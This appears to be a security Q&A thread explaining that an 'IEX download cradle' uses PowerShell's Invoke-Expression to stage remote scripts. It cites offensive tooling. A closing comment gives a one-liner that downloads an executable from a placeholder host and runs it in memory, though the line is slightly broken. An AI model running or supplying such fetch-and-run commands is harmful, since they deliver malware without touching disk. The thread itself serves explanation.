# What is an IEX download cradle?

Tags: penetration-test

Does anybody know what an IEX download cradle is?

Is it something that belongs only to the cyber security/pentesting realm?

I am asking based on this post: http://www.xorrior.com/powershell-web-drive-by-via-wmic/

My thoughts are that IEX stands for Internet Explorer, and that they may be using the browser's Download feature.

Answer (score 4, accepted):

It's PowerShell [Invoke-Expression](https://technet.microsoft.com/en-us/library/hh849893.aspx)

The meaning of `download cradle' comes from Raphael Mudge's talk on [Flying a Cylon Raider](https://youtu.be/26PedM_-zRo) where he describes how to continuously stage external PowerShell scripts from a launcher. In his techniques, which largely describe the use of [ReflectivePick](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) (popularized via PowerShellEmpire's psinject) from the original UnmanagedPowerShell work, a .NET runspace instance provides an execution context for the PowerShell [pipeline](https://msdn.microsoft.com/powershell/scripting/getting-started/fundamental/understanding-the-windows-powershell-pipeline).

Comment: [System.Reflection.Assembly]::Load((new-object net.webclient).downloaddata("https://some-site/download/file.exe"));$test.EntryPoint.Invoke($null,[Object[]] @(@(,([String[]] “Execution Flags"))))